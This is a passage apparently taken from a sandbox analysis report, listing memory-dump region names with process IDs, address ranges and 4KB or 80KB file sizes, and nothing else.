                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4736-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4744-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4752-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4804-509-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4832-620-0x000000000041A61A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4832-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4856-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4888-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/4896-313-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-305-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-314-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-310-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-311-0x00000000051A0000-0x00000000051A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-312-0x00000000051B0000-0x00000000051B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-308-0x0000000005170000-0x0000000005171000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-309-0x0000000005180000-0x0000000005181000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-323-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-321-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-318-0x0000000005210000-0x0000000005211000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-320-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-316-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-307-0x0000000005160000-0x0000000005161000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-306-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-319-0x0000000005220000-0x0000000005221000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-317-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-315-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-303-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                      • memory/4896-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5004-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5176-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5260-606-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5264-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5312-458-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5348-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5468-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5488-464-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5524-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5544-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5556-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5720-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5776-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5876-603-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/5876-431-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                      • memory/6024-434-0x0000000000000000-mapping.dmp